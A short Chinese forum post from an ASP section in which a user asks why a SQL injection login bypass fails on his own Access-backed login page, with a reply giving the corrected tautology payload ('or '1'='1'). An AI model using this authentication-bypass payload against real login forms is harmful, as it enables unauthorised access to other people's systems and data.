读书人

sql 语句简单注入的有关问题

发布时间: 2012-02-04 15:43:09 作者: rapoo

sql 语句简单注入的问题!
select * from aa where username= 'a 'and userpwd= 'c ' or 1= '1 '
这条sql语句能执行( 密码和用户名是错的但能显示出记录)

但是我放到我自己写的简单登陆页使用怎么报错呢?
Microsoft JET Database Engine (0x80040E07)
标准表达式中数据类型不匹配。
/meirong/admin/Tologin.asp, 第 18 行


是这条语句报的错 rs.open sql,conn,1,1
请问有人会简单sql注入我想知道怎样才能用我写那条sql登陆成功!

[解决办法]
select * from aa where username= 'a 'and userpwd= 'c ' or '1 '= '1 '

读书人网 >ASP

热点推荐